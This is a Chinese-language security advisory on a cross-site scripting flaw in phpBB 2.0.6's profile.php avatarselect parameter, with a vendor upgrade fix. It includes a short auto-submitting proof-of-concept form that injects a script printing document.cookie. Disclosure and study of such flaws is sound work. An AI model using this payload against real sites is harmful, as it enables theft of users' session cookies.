phpBB profile.php avatarselect跨站脚本漏洞
发布日期:2004-03-25
更新日期:2004-04-01
受影响系统:phpBB Group phpBB 2.0.6 d
不受影响系统:phpBB Group phpBB 2.0.8
描述:
BUGTRAQ ID:
9938
phpBB是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。
phpBB包含的'profile.php'脚本在处理"avatarselect"变量时缺少充分过滤,远程攻击者可以利用这个漏洞进行跨站脚本执行攻击,可能获得用户敏感数据信息。
问题存在于profile.php文件中,当点击[Show Gallery],phpBB会显示Avatar库,要求用户选择一个给自己,此表单中存在一个问题,在提交给phpBB后,phpBB会直接采用"avatarselect"作为路径参数而没有任何过滤,因此提交包含恶意脚本代码,当其他用户浏览器此链接时可造成敏感信息泄露。
<*来源:Cheng Peng Su (
apple_soup@msn.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=107997814221605&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Cheng Peng Su (
apple_soup@msn.com)提供了如下测试方法:
-------------exploit.htm--------------
<form name='f' action="
http://site/profile.php?mode=editprofile" method="post">
<input name="avatarselect" value='" ><script>alert(document.cookie)</script>'>
<input type="submit" name="submitavatar" value="Select avatar">
</form>
<script>
window.onload=function()
{
document.all.submitavatar.click();
}
</script>
---------------end-------------------
建议:
厂商补丁:
phpBB Group
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
phpBB Group Upgrade phpBB-2.0.8.zip
http://prdownloads.sourceforge.net/phpbb/phpBB-2.0.8.zip?download浏览次数:4517
严重程度:0(网友投票)
